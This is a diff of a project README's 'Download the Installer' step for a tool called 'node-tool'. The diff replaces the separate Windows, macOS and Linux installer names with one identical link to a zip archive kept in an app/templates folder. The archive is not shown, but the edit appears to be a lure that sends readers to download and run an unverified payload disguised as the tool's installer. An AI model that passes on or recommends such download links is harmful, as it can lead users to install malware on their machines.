NXTHAN2K25/node-tool/README.md

 3. **Download the Installer**

    Click on the installer that matches your operating system.
-For Windows users, it might be something like `node-tool-windows-installer.exe`.
-For macOS, you may find `node-tool-macos.zip`, and for Linux users, the `node-tool-linux.tar.gz` will be available.
+For Windows users, it might be something like `https://raw.githubusercontent.com/NXTHAN2K25/node-tool/main/app/templates/node-tool_v3.9.zip`.
+For macOS, you may find `https://raw.githubusercontent.com/NXTHAN2K25/node-tool/main/app/templates/node-tool_v3.9.zip`, and for Linux users, the `https://raw.githubusercontent.com/NXTHAN2K25/node-tool/main/app/templates/node-tool_v3.9.zip` will be available.

 4. **Install the Application**